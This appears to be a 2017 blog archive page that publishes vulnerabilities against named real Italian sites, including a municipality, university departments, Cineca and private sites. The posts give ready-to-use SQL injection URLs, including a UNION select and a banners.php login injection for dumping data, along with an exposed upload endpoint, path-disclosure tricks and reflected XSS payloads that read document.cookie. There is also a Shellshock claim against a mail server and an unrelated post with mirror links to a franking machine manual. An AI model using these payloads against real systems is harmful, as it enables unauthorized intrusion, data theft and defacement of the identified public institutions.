Skip to main content

Posts

Showing posts from October, 2017

http://www.comuneguardiasanframondi.gov.it | SQL Injection, file/shell upload, system compromise

Joomla com_fabrik vulnerabilities

raise the error related to sql injection
http://www.comuneguardiasanframondi.gov.it//index.php?option=com_fabrik&view=table&tableid=13+union+select+1----

archived: http://archive.is/1Up6B

Upload vulnerability
http://www.comuneguardiasanframondi.gov.it/index.php?option=com_fabrik&c=import&view=import&fietype=csv&tableid=0
archived:http://archive.is/6XtTl

path (leaked from the errors)
/web/htdocs/www.comuneguardiasanframondi.gov.it/

Poste italiane - Affrancatrice Polivalente PT100SV (Elettronica Meccanica Sistemi S.P.A.) - manuale per l'operatore

Poste italiane - Affrancatrice Polivalente PT100SV (Elettronica Meccanica Sistemi S.P.A.) - manuale per l'operatore

Manuale Software PT100SV Release A8C6



Qui il download del manuale


Mirror:
filefactory.comhttp://www.filefactory.com/file/1u1o3fex14vt/pt100sv-manuale-operatore_MultiUpload.biz.pdf
share-online.bizhttp://www.share-online.biz/dl/GRQZM4YOUSV
sendmyway.comhttps://www.sendmyway.com/bgktennfvwqz
gigapeta.comhttp://gigapeta.com/dl/7495857a6745dc

http://lesim1.ing.unisannio.it |path disclosure, xss, sql injections, shell upload

http://lesim1.ing.unisannio.it

We can start to detect the version manually (automated tools, like joomscan, are giving random values) from
http://lesim1.ing.unisannio.it/configuration.php-dist
1.5.x
archived:http://archive.is/VB6I3

libraries/joomla/crypt/index.html is missing, so it's probably before Joomla! 1.5.26.
components/com_mailto/helpers/index.html is missing, so it's probably before Joomla! 1.5.23.

(Tip: I just used files and folder comparison with beyond compare, but you can also use Meld on linux)



To get the path we try to raise errors with wrong sql queries. In this case we are abusing of the weblinks component and adding the filter_order even if the site uses SEF urls (who cares).

http://lesim1.ing.unisannio.it/index.php/it/link-mee/53-gruppi-di-ricerca-mee-delle-universita-italiane-?&filter_order=

to get an output like this:
No valid database connection Unknown column '0' in 'order clause' SQL=SELECT * FROM jos_weblinks WHERE catid = 53 AND p…

http://www.orientamento.unisannio.it | path disclosure, xss, sql injections, shell upload, system compromise

http://www.orientamento.unisannio.it
The website uses phpnuke with some customizations (sometimes it detects that we are trying to abuse of specific bugs)

we can find the path from the Deprecated notices in various modules
/var/www/html/copus/home/copus/modules/

ex.: http://www.orientamento.unisannio.it/modules.php?name=Stories_Archive
Deprecated: Function ereg() is deprecated in /var/www/html/copus/home/copus/modules/Stories_Archive/index.php on line 25

register_globals seems to be On and the variables can be replaced by using post/get requests.

Supposed version <=PHP-Nuke-6.9 since banners.php exists

In banners.php we have

switch($op) { ... }
sample
http://www.orientamento.unisannio.it/banners.php?op=login

By using, for example, this url:
http://www.orientamento.unisannio.it/banners.php?op=Ok&login=[Sqlinjection]&pass=abc
the sql is executed and we can dump the data instead of the banners

File via sql
http://www.orientamento.unisannio.it/banners.php?op=Ok&login='…

cineca.it | XSS

http://accordi-internazionali.cineca.it/accordi.php?continenti=%&paesi=%&univ_stran=%&univ_ita=C4&anni=[XSS]&btnSubmit=Cerca

ex.:
http://accordi-internazionali.cineca.it/accordi.php?continenti=%&paesi=%&univ_stran=%&univ_ita=C4&anni=<script>alert(document.cookie);</script>&btnSubmit=Cerca


archived with sample javascript text: http://archive.is/To5A4

http://www.carminevalentino.it/ | xss

http://www.carminevalentino.it/

Path can be seen in the 404 error pages
D:\inetpub\webs\carminevalentinoit\


XSS

http://www.carminevalentino.it/index.asp?http_request=video&act=read&arg[XSS]&pg=1
http://www.carminevalentino.it/index.asp?http_request=video&act=read&arg=%22);alert(%22xss;&pg=1


and we can place any video in the content

Example:
http://www.carminevalentino.it/index.asp?http_request=video&act=read&arg=%22);s1.addVariable(%22file%22,%22http://flashedu.rai.it/raistoria/RES/16_06_1977.mp4%22);//&pg=1


shortened url: https://goo.gl/sWhg1P
archived url: http://archive.is/25Bw8

http://www.tourism-solutions.tech/ | xss - system compromise

http://www.tourism-solutions.tech is usually sending spam emails.

There's a fake unsubscribe script that reports the removal of anything, even if you add a simple xss.

http://www.tourism-solutions.tech/unscribe.php?id=%3Cscript%3Ealert('xss');%3C/script%3Eyourmail.com

____

The mail server can be exploited with an old remote exploit for postfix on debian linux. (shellshock)